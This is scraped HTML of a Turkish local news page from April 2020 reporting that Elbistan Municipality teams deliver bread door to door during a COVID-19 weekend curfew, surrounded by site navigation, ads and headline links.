href="http://www.elbistaninsesi.com/kahramanmaras/piazzada-indirim-yarisi-h35825.html" title="Piazza’da indirim yarışı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/08/piazzada_indirim_yarisi.jpg" alt="Piazza’da indirim yarışı" /> Piazza’da indirim yarışı</a> </div> </div></div> </div> </div> </div> <div id="flashaber" flash-id="fh66328" > <div class="f-kapsayici"> <div class="f-baslik">Flaş Haber</div> <div class="f-haber"> <a href="http://www.elbistaninsesi.com/guncel/kahramanmaras-genelinde-hafta-sonu-icin-sokaga-cikma-yasagi-ilan-edildi-h66328.html" title="Kahramanmaraş genelinde hafta sonu için sokağa çıkma yasağı ilan edildi" target="_blank">Kahramanmaraş genelinde hafta sonu için sokağa çıkma yasağı ilan edildi</a> </div> <span class="glyphicons remove_2 f_kapat"></span> </div> </div> </div> <div id="mainContainer" class="container center shadow" style="padding-top:15px;"> <img src="http://www.elbistaninsesi.com/images/aboneol.jpg" width="937" height="45" /><br> <br> <!-- Üst Manşet --> <div id="ustkisim" class="row"> <div class="span12 reklam reklam106"><a href="http://www.elbistaninsesi.com/banner.php?id=136" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/YaYam_Hastanesi.jpg&w=980&h=250&q=90" width="980" height="250" style="width:980px;height: 250px;border:0" alt="banner136" /></a></div> <div id="ustmanset" class="span12"> <div class="row-fluid"> <ul class="thumbnails five"> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/seyyar-saticilarin-urunlerini-elbistan-belediyesi-satin-alacak-h66338.html" title="Seyyar satıcıların ürünlerini Elbistan Belediyesi satın alacak" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/04/8528fa94-f304-4043-898f-bacaf4345715.jpg" alt="Seyyar satıcıların ürünlerini Elbistan Belediyesi satın alacak" class="pull-left" /> <div class="caption-line"><p>Seyyar satıcıların ürünlerini Elbistan Belediyesi...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/elbistana-sessizlik-hakim-oldu-h66337.html" title="Elbistan’a sessizlik hakim oldu" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/04/2.jpg" alt="Elbistan’a sessizlik hakim oldu" class="pull-left" /> <div class="caption-line"><p>Elbistan’a sessizlik hakim oldu</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/kaymakam-demirden-175yil-ziyareti-h66332.html" title="Kaymakam Demir’den 175.yıl ziyareti" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/04/Ysimsiz-1_4.jpg" alt="Kaymakam Demir’den 175.yıl ziyareti" class="pull-left" /> <div class="caption-line"><p>Kaymakam Demir’den 175.yıl ziyareti</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/yasak-basladi-uymayana-3-bin-180-tl-ceza-kesilecek-h66330.html" title="Yasak başladı, uymayana 3 bin 180 TL ceza kesilecek" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/04/dc00176e-0f82-4768-8a15-7b266de8e82e.jpg" alt="Yasak başladı, uymayana 3 bin 180 TL ceza kesilecek" class="pull-left" /> <div class="caption-line"><p>Yasak başladı, uymayana 3 bin...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/sokaga-cikma-yasaginin-kapsami-belli-oldu-h66329.html" title="Sokağa çıkma yasağının kapsamı belli oldu" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/04/indir_1_1.jpg" alt="Sokağa çıkma yasağının kapsamı belli oldu" class="pull-left" /> <div class="caption-line"><p>Sokağa çıkma yasağının kapsamı belli...</p></div> </a> </li> </ul> </div> </div> </div> <!-- MAIN --> <div class="row"> <div class="page-header-fixed style hide"> <div class="title"></div> <div class="pull-right"> <span class="scroll-link d-goto" id="yorumyaplink" style="margin-right: 15px;"><i class="halflings-icon comments"></i> Yorum Yap</span> <a class="print d-print" href="javascript:window.print()" style="margin-right: 15px;"><i class="halflings-icon print"></i> Yazdır</a> <a href="javascript:void(0);" onclick="shareFacebook(gsTitle, gsUrl);" class="d-share" rel="nofollow" style="margin-right: 15px;"><i class="halflings-icon share-alt"></i> <b>Facebook</b>'ta Paylaş</a> </div> </div> <!-- Sol Blok --> <div id="main" class="span8"> <article id="haber"> <div class="page-header clearfix"> <h1 class="title gs-title" itemprop="name">Elbistan Belediyesi ekipleri ekmek dağıtımı için sahada</h1> <h2 class="lead" itemprop="description"><strong>Elbistan Belediyesi, 2 günlük sokağa çıkma yasağı nedeniyle evlerinde kalan vatandaşlara ekmek dağıtımı gerçekleştiriyor.</strong></h2> </div> <div class="row-fluid muted"> <p class="pull-left"><span itemprop="datePublished" class="tarih-degistir" data-date="2020-04-11 16:05:18" content="2020-04-11T16:05:18+02:00">11 Nisan 2020 Cumartesi 16:05</span></p> </div> <div class="row-fluid newspic"> <span> <img src="http://www.elbistaninsesi.com/images/haberler/2020/04/elbistan_belediyesi_ekipleri_ekmek_dagitimi_icin_sahada_h66336_1b3c4.jpg" alt="Elbistan Belediyesi ekipleri ekmek dağıtımı için sahada" itemprop="image"/> </span> </div> <div class="row-fluid page-social"> <div class="span9"> <div class="shr"> <div class="gs-share"> <a class="gs-twitter"></a> <a class="gs-facebook"></a> <a class="gs-linkedin"></a> <a class="gs-google"></a> <div class="fb-like" data-href="http://www.elbistaninsesi.com/guncel/elbistan-belediyesi-ekipleri-ekmek-dagitimi-icin-sahada-h66336.html" data-width="100" data-layout="button_count" data-action="like" data-show-faces="true" data-share="true"></div> </div> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> </div> </div> <div class="span3 karakterislem secilemez"> <i class="glyphicons-icon text_smaller"></i> <i class="glyphicons-icon text_bigger"></i> <i class="glyphicons-icon font"></i> <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a> </div> </div> <div id="newstext" class="row-fluid page-content"> <div class="reklam reklam132 haber"><a href="http://www.elbistanbalikdunyasi.com" target="_blank"><img src="https://www.elbistanolay.com/sites/84/uploads/2020/01/17/large/balikdunyasi.gif" alt="Balik Dunyasi Reklam" border="0"/></a></div> <div class="reklam reklam135 text-center"><a href="http://www.elbistaninsesi.com/banner.php?id=43" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/banner/600-animasyon_1.gif" width="600" height="200" style="width:600px;height: 200px;border:0" alt="banner43" /></a></div> <div itemprop="articleBody" id="newsbody"><span style="font-size: 16px;">&#160;</span> <p class="MsoNormal" style="text-indent:9.0pt"><span style="font-size: 16px;"><span style="font-family: Arial;">Elbistan Belediyesi, 2 günlük sokağa çıkma yasağı nedeniyle evlerinde kalan vatandaşlara ekmek dağıtımı gerçekleştiriyor.</span></span><span style="font-size:10.0pt;&#10;font-family:Arial"><o:p></o:p></span></p> <p class="MsoNormal" style="text-indent:9.0pt"><span style="font-size: 16px;"><span style="font-family: Arial;">Elbistan Belediyesi İçişleri Bakanlığı’nın genelgesiyle 30 büyükşehir ve Zonguldak’ta uygulamaya konan iki günlük sokağa çıkma yasağı nedeniyle evde kalan Elbistanlı vatandaşları ekmeksiz bırakmıyor. Zabıta ekipleri ilçe merkezinde öncelikle hastalar, 65 yaş ve üstü Elbistanlılar olmak üzere sokağa çıkamayan vatandaşların evlerine kadar gidiyor ve hane sayısınca ekmekleri teslim ediyor.</span></span><span style="font-size:10.0pt;&#10;font-family:Arial"><o:p></o:p></span></p> <p class="MsoNormal" style="text-indent:9.0pt"><span style="font-size: 16px;"><span style="font-family: Arial;">Ekmek dağıtımının yarın da devam edeceğini belirten Elbistan Belediyesi yetkilileri vatandaşların panik ve telaşa kapılmamalarını hatırlattı.</span></span><span style="font-size:10.0pt;&#10;font-family:Arial"><o:p></o:p></span></p> <p class="MsoNormal" style="text-indent:9.0pt"><span style="font-size: 16px;"><span style="font-family: Arial;">Konuyla ilgili olarak yapılan açıklamada, “İçişleri Bakanlığı’nın genelgesiyle 30 büyükşehir ve Zonguldak’ta uygulamaya konan iki günlük sokağa çıkma yasağı ilçemizde de uygulanmaktadır. Vatandaşlarımızın ekmek ihtiyacını karşılamak için hareket geçen belediyemiz, halk ekmek fırının da ekmek üretimini iki katına çıkardı. Bu sabah itibariyle halk ekmek fabrikasına bağlı personellerimiz zabıta ekipleri eşliğinde mahallelere giderek ekmek ihtiyacı olan vatandaşlarımıza anonslar ile ulaşıyor. Her eve, hane halkı sayısınca ekmek teslim eden zabıta ekiplerimiz, hastalar, 65 yaş ve üstü vatandaşlarımız, kimsesiz ve ekmek alamayacak kadar mağdur olan insanlarımıza ise evlerine kadar giderek ekmeklerini ulaştırıyor. Bu durumda olan vatandaşlarımızın 0344 413 15 77-78 numaralı hattan bizlere ulaşarak ekmek ihtiyaçlarını evlerine kadar talepte bulunabilirler.</span></span><span style="font-size:10.0pt;&#10;font-family:Arial"><o:p></o:p></span></p> <p class="MsoNormal" style="text-indent:9.0pt"><span style="font-size: 16px;"><span style="font-family: Arial;">Halkımızdan ricamız, herkes evinde kalsın. Paniğe telaşa gerek yok. Kimseyi ekmeksiz, susuz bırakmayacağız. Sakin olun, huzurlu olun. Yanınızda olmaya devam edeceğiz” ifadelerine yer verildi.<br /> <img src="/images/upload/dde95ff0-259e-4924-af02-cb4238c044d8.jpg" width="800" height="541" alt="" /><br /> <img src="/images/upload/3998414e-ca59-47ec-95f1-7de2df3a4f06.jpg" width="800" height="533" alt="" /><br /> <img src="/images/upload/9891a3cf-a22f-4958-a91d-c787ce3b2b87.jpg" width="800" height="434" alt="" /><br /> <img src="/images/upload/312f5ddf-92c1-4606-a7aa-88735b32a92a.jpg" width="800" height="533" alt="" /><br /> <br /> <img src="/images/upload/50d6a668-59ba-4c94-a7f9-e1ce4836c4a2.jpg" width="800" height="533" alt="" /></span></span><span style="font-size:10.0pt;&#10;font-family:Arial"><o:p></o:p></span></p></div> <div class="reklam reklam136 text-center"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- Yatay Reklamlar --> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-9060105052041849" data-ad-slot="7690067735" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></div> </div> <br> <div class="box ilgili"> <div class="box header black"> <a href="#"><h5 class="glyphicons fire">Yerel Manşetler</h5></a> </div> </article> <div class="hide-print"> <div id="anamanset" class="carousel hs-manset slid"> <ol class="carousel-indicators twentyfive carousel-hover"> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/seyyar-saticilarin-urunlerini-elbistan-belediyesi-satin-alacak-h66338.html'; return false;" data-target="#anamanset" data-slide-to="0" class="active">1</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistana-sessizlik-hakim-oldu-h66337.html'; return false;" data-target="#anamanset" data-slide-to="1" >2</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistan-belediyesi-ekipleri-ekmek-dagitimi-icin-sahada-h66336.html'; return false;" data-target="#anamanset" data-slide-to="2" >3</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/gida-yardimlari-evlerinde-teslim-ediliyor-h66335.html'; return false;" data-target="#anamanset" data-slide-to="3" >4</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/bolgede-ilk-kez-goruldu-sakin-oldurmeyin-h66334.html'; return false;" data-target="#anamanset" data-slide-to="4" >5</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/kumbarasindaki-parayi-milli-dayanisma-kampanyasina-bagisladi-h66333.html'; return false;" data-target="#anamanset" data-slide-to="5" >6</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/kaymakam-demirden-175yil-ziyareti-h66332.html'; return false;" data-target="#anamanset" data-slide-to="6" >7</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/oztunc-ciftciler-plan-degil-pilav-istiyor-pilav-h66331.html'; return false;" data-target="#anamanset" data-slide-to="7" >8</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/yasak-basladi-uymayana-3-bin-180-tl-ceza-kesilecek-h66330.html'; return false;" data-target="#anamanset" data-slide-to="8" >9</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/sokaga-cikma-yasaginin-kapsami-belli-oldu-h66329.html'; return false;" data-target="#anamanset" data-slide-to="9" >10</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/kahramanmaras-genelinde-hafta-sonu-icin-sokaga-cikma-yasagi-ilan-edildi-h66328.html'; return false;" data-target="#anamanset" data-slide-to="10" >11</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/polis-haftasi-icin-sade-toren-h66319.html'; return false;" data-target="#anamanset" data-slide-to="11" >12</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/il-umumi-hifzissihha-meclisinden-koronavirusle-ilgili-yeni-tedbirler-h66324.html'; return false;" data-target="#anamanset" data-slide-to="12" >13</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistan-kaymakamligindan-yardim-iddialarina-yalanlama-h66325.html'; return false;" data-target="#anamanset" data-slide-to="13" >14</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/sec-market-esentepe-subesi-hizmete-acildi-h66323.html'; return false;" data-target="#anamanset" data-slide-to="14" >15</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/goksunda-bir-mahalle-karantinaya-alindi-h66321.html'; return false;" data-target="#anamanset" data-slide-to="15" >16</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/buyuksehirden-dort-yarisma-h66326.html'; return false;" data-target="#anamanset" data-slide-to="16" >17</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/canli-muhre-ile-keklik-avi-cezasiz-kalmadi-h66320.html'; return false;" data-target="#anamanset" data-slide-to="17" >18</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/78-yasindaki-hasta-koronavirusu-yendi-h66318.html'; return false;" data-target="#anamanset" data-slide-to="18" >19</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/turkiyeye-ornek-olacak-izolasyon-merkezi-projesi-hayata-geciyor-h66316.html'; return false;" data-target="#anamanset" data-slide-to="19" >20</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/baskan-paksoydan-bankalara-cagri-h66315.html'; return false;" data-target="#anamanset" data-slide-to="20" >21</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/dumlupinar-tohum-hibe-projesine-kahramanmaras-da-dahil-edilmeli-h66314.html'; return false;" data-target="#anamanset" data-slide-to="21" >22</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/kaymakam-demire-polis-haftasi-ziyareti-h66313.html'; return false;" data-target="#anamanset" data-slide-to="22" >23</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistan-belediyesi-sokak-hayvanlarini-unutmadi-h66312.html'; return false;" data-target="#anamanset" data-slide-to="23" >24</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/sosyal-yardim-parasini-biz-bize-yeteriz-turkiyem-kampanyasina-bagisladi-h66311.html'; return false;" data-target="#anamanset" data-slide-to="24" >25</li> </ol> <div class="carousel-inner"> <div class="item active"> <a href="http://www.elbistaninsesi.com/guncel/seyyar-saticilarin-urunlerini-elbistan-belediyesi-satin-alacak-h66338.html" title="Seyyar satıcıların ürünlerini Elbistan Belediyesi satın alacak"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/04/seyyar_saticilarin_urunlerini_elbistan_belediyesi_satin_alacak_h66338_618e6.jpg" alt="Seyyar satıcıların ürünlerini Elbistan Belediyesi satın alacak" /> <div class="carousel-caption"> <h2> <span style="font-size:">Seyyar satıcıların ürünlerini Elbistan Belediyesi satın alacak</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistana-sessizlik-hakim-oldu-h66337.html" title="Elbistan’a sessizlik hakim oldu"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/04/elbistana_sessizlik_hakim_oldu_h66337_74927.JPG" alt="Elbistan’a sessizlik hakim oldu" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan’a sessizlik hakim oldu</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistan-belediyesi-ekipleri-ekmek-dagitimi-icin-sahada-h66336.html" title="Elbistan Belediyesi ekipleri ekmek dağıtımı için sahada"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/04/elbistan_belediyesi_ekipleri_ekmek_dagitimi_icin_sahada_h66336_1b3c4.jpg" alt="Elbistan Belediyesi ekipleri ekmek dağıtımı için sahada" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan Belediyesi ekipleri ekmek dağıtımı için sahada</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/gida-yardimlari-evlerinde-teslim-ediliyor-h66335.html" title="Gıda yardımları evlerinde teslim ediliyor"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/04/gida_yarimlari_evlerinde_teslim_ediliyor_h66335_5729f.jpg" alt="Gıda yardımları evlerinde teslim ediliyor" /> <div class="carousel-caption"> <h2> <span style="font-size:">Gıda yardımları evlerinde teslim ediliyor</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/bolgede-ilk-kez-goruldu-sakin-oldurmeyin-h66334.html" title="Bölgede ilk kez görüldü, sakın öldürmeyin!"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/04/bolgede_ilk_kez_goruldu_sakin_oldurmeyin_h66334_32e6f.jpg" alt="Bölgede ilk kez görüldü, sakın öldürmeyin!" /> <div class="carousel-caption"> <h2> <span style="font-size:">Bölgede ilk kez görüldü, sakın öldürmeyin!</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/kumbarasindaki-parayi-milli-dayanisma-kampanyasina-bagisladi-h66333.html" title="Kumbarasındaki parayı Milli Dayanışma Kampanyasına bağışladı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/04/kumbarasindaki_parayi_milli_dayanisma_kampanyasina_bagisladi_h66333_a4204.jpg" alt="Kumbarasındaki parayı Milli Dayanışma Kampanyasına bağışladı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Kumbarasındaki parayı Milli Dayanışma Kampanyasına bağışladı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/kaymakam-demirden-175yil-ziyareti-h66332.html" title="Kaymakam Demir’den 175.yıl ziyareti"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/04/kaymakam_demirden_175yil_ziyareti_h66332_2c259.jpg" alt="Kaymakam Demir’den 175.yıl ziyareti" /> <div class="carousel-caption"> <h2> <span style="font-size:">Kaymakam Demir’den 175.yıl ziyareti</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/oztunc-ciftciler-plan-degil-pilav-istiyor-pilav-h66331.html" title="Öztunç: “Çiftçiler plan değil pilav istiyor pilav!”"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/04/oztunc_ciftiler_plan_degil_pilav_istiyor_pilav_h66331_efb1a.jpg" alt="Öztunç: “Çiftçiler plan değil pilav istiyor pilav!”" /> <div class="carousel-caption"> <h2> <span style="font-size:">Öztunç: “Çiftçiler plan değil pilav istiyor pilav!”</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/yasak-basladi-uymayana-3-bin-180-tl-ceza-kesilecek-h66330.html" title="Yasak başladı, uymayana 3 bin 180 TL ceza kesilecek"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/04/yasak_basladi_uymayana_3_bin_180_tl_ceza_kesilecek_h66330_ffda6.jpg" alt="Yasak başladı, uymayana 3 bin 180 TL ceza kesilecek" /> <div class="carousel-caption"> <h2> <span style="font-size:">Yasak başladı, uymayana 3 bin 180 TL ceza kesilecek</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/sokaga-cikma-yasaginin-kapsami-belli-oldu-h66329.html" title="Sokağa çıkma yasağının kapsamı belli oldu"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/04/sokaga_cikma_yasaginin_kapsami_belli_oldu_h66329_07ddc.jpg" alt="Sokağa çıkma yasağının kapsamı belli oldu" /> <div class="carousel-caption"> <h2> <span style="font-size:">Sokağa çıkma yasağının kapsamı belli oldu</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/kahramanmaras-genelinde-hafta-sonu-icin-sokaga-cikma-yasagi-ilan-edildi-h66328.html" title="Kahramanmaraş genelinde hafta sonu için sokağa çıkma yasağı ilan edildi"> <span class="label label-important"><i class="halflings-icon white exclamation-sign"></i> Son Dakika</span> <img src="http://www.elbistaninsesi.com/images/haberler/2020/04/kahramanmaras_genelinde_hafta_sonu_icin_sokaga_cikma_yasagi_ilan_edildi_h66328_5c2f3.jpg" alt="Kahramanmaraş genelinde hafta sonu için sokağa çıkma yasağı ilan edildi" /> <div class="carousel-caption"> <h2> <span style="font-size:">Kahramanmaraş genelinde hafta sonu için sokağa çıkma yasağı ilan edildi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/polis-haftasi-icin-sade-toren-h66319.html" title="Polis Haftası için sade tören"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/04/polis_haftasi_icin_sade_toren_h66319_663d3.jpg" alt="Polis Haftası için sade tören" /> <div class="carousel-caption"> <h2> <span style="font-size:">Polis Haftası için sade tören</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/il-umumi-hifzissihha-meclisinden-koronavirusle-ilgili-yeni-tedbirler-h66324.html" title="İl Umumi Hıfzıssıhha Meclisi’nden koronavirüsle ilgili yeni tedbirler"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/04/il_umumi_hifzissihha_meclisinden_koronavirusle_ilgili_yeni_tedbirler_h66324_b9635.jpg" alt="İl Umumi Hıfzıssıhha Meclisi’nden koronavirüsle ilgili yeni tedbirler" /> <div class="carousel-caption"> <h2> <span style="font-size:">İl Umumi Hıfzıssıhha Meclisi’nden koronavirüsle ilgili yeni tedbirler</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistan-kaymakamligindan-yardim-iddialarina-yalanlama-h66325.html" title="Elbistan Kaymakamlığı’ndan ‘yardım’ iddialarına yalanlama"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/04/elbistan_kaymakamligindan_yardim_iddialarina_yalanlama_h66325_9da7f.jpg" alt="Elbistan Kaymakamlığı’ndan ‘yardım’ iddialarına yalanlama" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan Kaymakamlığı’ndan ‘yardım’ iddialarına yalanlama</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/sec-market-esentepe-subesi-hizmete-acildi-h66323.html" title="SEÇ Market Esentepe şubesi hizmete açıldı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/04/sec_market_esentepe_subesi_hizmete_acildi_h66323_379ef.jpg" alt="SEÇ Market Esentepe şubesi hizmete açıldı" /> <div class="carousel-caption"> <h2> <span style="font-size:">SEÇ Market Esentepe şubesi hizmete açıldı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/goksunda-bir-mahalle-karantinaya-alindi-h66321.html" title="Göksun’da bir mahalle karantinaya alındı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/04/goksunda_bir_mahalle_karantinaya_alindi_h66321_5e754.jpg" alt="Göksun’da bir mahalle karantinaya alındı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Göksun’da bir mahalle karantinaya alındı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/buyuksehirden-dort-yarisma-h66326.html" title="Büyükşehir’den dört yarışma"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/04/buyuksehirden_dort_yarisma_h66326_115bc.jpg" alt="Büyükşehir’den dört yarışma" /> <div class="carousel-caption"> <h2> <span style="font-size:">Büyükşehir’den dört yarışma</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/canli-muhre-ile-keklik-avi-cezasiz-kalmadi-h66320.html" title="Canlı mühre ile keklik avı cezasız kalmadı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/04/canli_muhre_ile_keklik_avi_cezasiz_kalmadi_h66320_b2550.jpg" alt="Canlı mühre ile keklik avı cezasız kalmadı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Canlı mühre ile keklik avı cezasız kalmadı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/78-yasindaki-hasta-koronavirusu-yendi-h66318.html" title="78 yaşındaki hasta koronavirüsü yendi"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/04/78_yasindaki_hasta_koronavirusu_yendi_h66318_e74ae.jpg" alt="78 yaşındaki hasta koronavirüsü yendi" /> <div class="carousel-caption"> <h2> <span style="font-size:">78 yaşındaki hasta koronavirüsü yendi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/turkiyeye-ornek-olacak-izolasyon-merkezi-projesi-hayata-geciyor-h66316.html" title="Türkiye’ye örnek olacak İzolasyon Merkezi projesi hayata geçiyor"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/04/turkiyeye_ornek_olacak_izolasyon_merkezi_projesi_hayata_geciyor_h66316_48923.jpg" alt="Türkiye’ye örnek olacak İzolasyon Merkezi projesi hayata geçiyor" /> <div class="carousel-caption"> <h2> <span style="font-size:">Türkiye’ye örnek olacak İzolasyon Merkezi projesi hayata geçiyor</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/baskan-paksoydan-bankalara-cagri-h66315.html" title="Başkan Paksoy’dan bankalara çağrı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/04/baskan_paksoydan_bankalara_cagri_h66315_2b1f0.jpg" alt="Başkan Paksoy’dan bankalara çağrı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Başkan Paksoy’dan bankalara çağrı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/dumlupinar-tohum-hibe-projesine-kahramanmaras-da-dahil-edilmeli-h66314.html" title="Dumlupınar: “Tohum hibe projesine Kahramanmaraş da dahil edilmeli”"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/04/dumlupinar_tohum_hibe_projesine_kahramanmaras_da_dahil_edilmeli_h66314_b6bc6.jpeg" alt="Dumlupınar: “Tohum hibe projesine Kahramanmaraş da dahil edilmeli”" /> <div class="carousel-caption"> <h2> <span style="font-size:">Dumlupınar: “Tohum hibe projesine Kahramanmaraş da dahil edilmeli”</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/kaymakam-demire-polis-haftasi-ziyareti-h66313.html" title="Kaymakam Demir’e Polis Haftası ziyareti"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/04/kaymakam_demire_polis_haftasi_ziyareti_h66313_15e5c.jpg" alt="Kaymakam Demir’e Polis Haftası ziyareti" /> <div class="carousel-caption"> <h2> <span style="font-size:">Kaymakam Demir’e Polis Haftası ziyareti</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistan-belediyesi-sokak-hayvanlarini-unutmadi-h66312.html" title="Elbistan Belediyesi, sokak hayvanlarını unutmadı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/04/elbistan_belediyesi_sokak_hayvanlarini_unutmadi_h66312_aef0a.jpg" alt="Elbistan Belediyesi, sokak hayvanlarını unutmadı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan Belediyesi, sokak hayvanlarını unutmadı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/sosyal-yardim-parasini-biz-bize-yeteriz-turkiyem-kampanyasina-bagisladi-h66311.html" title="Sosyal yardım parasını ‘Biz Bize Yeteriz Türkiyem’ kampanyasına bağışladı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/04/sosyal_yardim_parasini_biz_bize_yeteriz_turkiyem_kampanyasina_bagisladi_h66311_9d57c.jpg" alt="Sosyal yardım parasını ‘Biz Bize Yeteriz Türkiyem’ kampanyasına bağışladı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Sosyal yardım parasını ‘Biz Bize Yeteriz Türkiyem’ kampanyasına bağışladı</span> </h2> </div> </a> </div> </div> <a class="carousel-control left" href="#anamanset" data-slide="prev">&lsaquo;</a> <a class="carousel-control right" href="#anamanset" data-slide="next">&rsaquo;</a> </div> </div> <div class="row-fluid galleries"> <div class="title"> <span>İlgili Galeriler</span><hr> </div> <div class="content"> <div class="span3"> <a href="http://www.elbistaninsesi.com/elbistan-tarihi-organizeye-ev-sahipligi-yapti-resimleri,38.html" title="Elbistan, tarihi organizeye ev sahipliği yaptı"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_5431.jpg" alt="Elbistan, tarihi organizeye ev sahipliği yaptı" /> <b>Elbistan, tarihi organizeye ev sahipliği yaptı</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/donatir-mobilyadan-hediye-yagmuru-resimleri,37.html" title="Donatır Mobilya’dan hediye yağmuru"> 